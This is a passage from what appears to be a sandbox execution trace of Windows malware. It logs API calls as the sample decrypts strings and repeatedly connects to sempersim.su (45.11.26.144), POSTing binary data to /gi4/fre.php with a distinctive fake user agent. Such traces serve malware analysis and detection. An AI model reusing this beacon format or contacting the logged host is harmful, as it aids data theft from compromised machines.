ppResult=0xdfcd8*=0x0) returned 11001 [0195.763] GetProcessHeap () returned 0x5b0000 [0195.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb1a0 | out: hHeap=0x5b0000) returned 1 [0195.764] GetProcessHeap () returned 0x5b0000 [0195.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0195.764] GetProcessHeap () returned 0x5b0000 [0195.764] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0195.978] GetProcessHeap () returned 0x5b0000 [0195.978] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2ff0 [0195.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.979] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0195.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.984] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0195.992] GetProcessHeap () returned 0x5b0000 [0195.992] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0195.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.993] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0195.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.994] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0195.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.995] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0195.995] GetProcessHeap () returned 0x5b0000 [0195.995] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0195.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.996] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2ff0, pdwDataLen=0xdfcfc | out: pbData=0x5d2ff0, pdwDataLen=0xdfcfc) returned 1 [0195.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.997] CryptDestroyKey (hKey=0x5be048) returned 1 [0195.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0195.998] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0195.998] GetProcessHeap () returned 0x5b0000 [0195.998] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0195.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0196.001] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0196.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0196.002] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0196.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0196.003] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0196.003] GetProcessHeap () returned 0x5b0000 [0196.003] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0196.004] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0196.005] GetProcessHeap () returned 0x5b0000 [0196.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca940 [0196.005] socket (af=2, type=1, protocol=6) returned 0x2fc [0196.005] connect (s=0x2fc, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0196.081] FreeAddrInfoW (pAddrInfo=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0196.081] GetProcessHeap () returned 0x5b0000 [0196.081] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5888 [0196.081] GetProcessHeap () returned 0x5b0000 [0196.081] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0196.082] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0196.083] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0196.083] GetProcessHeap () returned 0x5b0000 [0196.083] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0196.083] GetProcessHeap () returned 0x5b0000 [0196.083] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0196.083] GetProcessHeap () returned 0x5b0000 [0196.083] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3620 [0196.083] GetProcessHeap () returned 0x5b0000 [0196.083] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0196.084] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0196.085] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0196.085] GetProcessHeap () returned 0x5b0000 [0196.085] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0196.085] GetProcessHeap () returned 0x5b0000 [0196.085] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0196.085] send (s=0x2fc, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0196.086] send (s=0x2fc, buf=0x5d1e18*, len=159, flags=0) returned 159 [0196.086] GetProcessHeap () returned 0x5b0000 [0196.086] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0196.086] recv (in: s=0x2fc, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0197.087] GetProcessHeap () returned 0x5b0000 [0197.088] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0197.088] GetProcessHeap () returned 0x5b0000 [0197.088] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3620 | out: hHeap=0x5b0000) returned 1 [0197.088] GetProcessHeap () returned 0x5b0000 [0197.088] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0197.089] GetProcessHeap () returned 0x5b0000 [0197.089] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5888 | out: hHeap=0x5b0000) returned 1 [0197.089] closesocket (s=0x2fc) returned 0 [0197.089] GetProcessHeap () returned 0x5b0000 [0197.089] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca940 | out: hHeap=0x5b0000) returned 1 [0197.089] GetProcessHeap () returned 0x5b0000 [0197.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0197.090] GetProcessHeap () returned 0x5b0000 [0197.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0197.090] GetProcessHeap () returned 0x5b0000 [0197.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0197.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x2f4) returned 0x2fc [0197.093] Sleep (dwMilliseconds=0xea60) [0197.111] GetProcessHeap () returned 0x5b0000 [0197.111] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0197.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.112] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0197.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.120] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0197.130] GetProcessHeap () returned 0x5b0000 [0197.130] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0197.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.131] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0197.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.131] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0197.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.132] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.132] GetProcessHeap () returned 0x5b0000 [0197.133] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0197.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.133] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0197.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.134] CryptDestroyKey (hKey=0x5be288) returned 1 [0197.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.135] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0197.135] GetProcessHeap () returned 0x5b0000 [0197.135] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0197.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.136] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.137] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.138] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.138] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.138] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.139] GetProcessHeap () returned 0x5b0000 [0197.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0197.139] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0197.139] GetProcessHeap () returned 0x5b0000 [0197.139] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0197.139] GetProcessHeap () returned 0x5b0000 [0197.140] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0197.145] GetProcessHeap () returned 0x5b0000 [0197.145] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0197.145] GetProcessHeap () returned 0x5b0000 [0197.145] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0197.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.146] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0197.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.152] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0197.160] GetProcessHeap () returned 0x5b0000 [0197.160] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0197.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.161] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0197.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.161] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0197.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.162] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.162] GetProcessHeap () returned 0x5b0000 [0197.163] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0197.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.163] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0197.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.164] CryptDestroyKey (hKey=0x5bde08) returned 1 [0197.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0197.165] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0197.165] GetProcessHeap () returned 0x5b0000 [0197.165] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0197.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.167] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0197.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.167] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0197.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0197.168] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0197.168] GetProcessHeap () returned 0x5b0000 [0197.168] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0197.168] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdd40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0197.170] GetProcessHeap () returned 0x5b0000 [0197.170] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9a0 [0197.170] socket (af=2, type=1, protocol=6) returned 0x300 [0197.170] connect (s=0x300, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0197.253] FreeAddrInfoW (pAddrInfo=0x5cdd40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0197.253] GetProcessHeap () returned 0x5b0000 [0197.253] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0197.253] GetProcessHeap () returned 0x5b0000 [0197.253] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0197.254] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0197.255] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0197.255] GetProcessHeap () returned 0x5b0000 [0197.255] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0197.255] GetProcessHeap () returned 0x5b0000 [0197.256] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0197.256] GetProcessHeap () returned 0x5b0000 [0197.256] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2f60 [0197.256] GetProcessHeap () returned 0x5b0000 [0197.256] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0197.257] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0197.258] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0197.258] GetProcessHeap () returned 0x5b0000 [0197.258] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0197.258] GetProcessHeap () returned 0x5b0000 [0197.258] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0197.258] send (s=0x300, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0197.259] send (s=0x300, buf=0x5d1e18*, len=159, flags=0) returned 159 [0197.259] GetProcessHeap () returned 0x5b0000 [0197.259] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0197.259] recv (in: s=0x300, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0198.649] GetProcessHeap () returned 0x5b0000 [0198.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0198.650] GetProcessHeap () returned 0x5b0000 [0198.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2f60 | out: hHeap=0x5b0000) returned 1 [0198.650] GetProcessHeap () returned 0x5b0000 [0198.650] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0198.650] GetProcessHeap () returned 0x5b0000 [0198.651] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0198.651] closesocket (s=0x300) returned 0 [0198.652] GetProcessHeap () returned 0x5b0000 [0198.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9a0 | out: hHeap=0x5b0000) returned 1 [0198.652] GetProcessHeap () returned 0x5b0000 [0198.652] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0198.652] GetProcessHeap () returned 0x5b0000 [0198.653] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0198.653] GetProcessHeap () returned 0x5b0000 [0198.653] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0198.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x684) returned 0x300 [0198.656] Sleep (dwMilliseconds=0xea60) [0198.673] GetProcessHeap () returned 0x5b0000 [0198.673] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3620 [0198.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.674] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0198.679] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.680] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0198.690] GetProcessHeap () returned 0x5b0000 [0198.690] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0198.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.691] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0198.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.692] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0198.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.693] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.693] GetProcessHeap () returned 0x5b0000 [0198.693] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0198.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.694] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3620, pdwDataLen=0xdfcfc | out: pbData=0x5d3620, pdwDataLen=0xdfcfc) returned 1 [0198.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.695] CryptDestroyKey (hKey=0x5bde08) returned 1 [0198.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.696] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0198.696] GetProcessHeap () returned 0x5b0000 [0198.696] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0198.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.697] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.698] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.702] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0198.703] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.703] GetProcessHeap () returned 0x5b0000 [0198.703] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0198.703] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0198.703] GetProcessHeap () returned 0x5b0000 [0198.703] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0198.704] GetProcessHeap () returned 0x5b0000 [0198.704] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0198.704] GetProcessHeap () returned 0x5b0000 [0198.704] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3620 | out: hHeap=0x5b0000) returned 1 [0198.704] GetProcessHeap () returned 0x5b0000 [0198.704] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0198.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0198.705] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, 